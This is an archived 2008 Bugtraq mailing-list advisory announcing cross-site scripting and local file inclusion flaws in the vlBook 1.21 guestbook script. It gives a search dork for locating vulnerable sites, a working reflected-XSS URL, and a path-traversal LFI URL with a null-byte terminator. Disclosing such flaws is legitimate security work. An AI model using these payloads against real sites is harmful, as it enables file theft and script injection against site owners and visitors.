lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080501172954.29158.qmail@securityfocus.com> Date: 1 May 2008 17:29:54 -0000 From: irancrash@...il.com To: bugtraq@...urityfocus.com Subject: vlBook 1.21 (ALL VERSION) ---------------------------------------------------------------- Script : vlBook 1.21 (ALL VERSION) Type : Multiple Remote Vulnerabilities (LFI/XSS) ---------------------------------------------------------------- Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) ---------------------------------------------------------------- Our Site : Http://IRCRASH.COM ---------------------------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ---------------------------------------------------------------- Script Download : http://home.vlab.info/vlbook_1.21.zip ---------------------------------------------------------------- DORK : "Powered by vlBook 1.21" ---------------------------------------------------------------- #XSS Address : http://example/?l=" <script>alert('xss')</script> ---------------------------------------------------------------- #LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 ---------------------------------------------------------------- TNx : God...... ----------------------------------------------------------------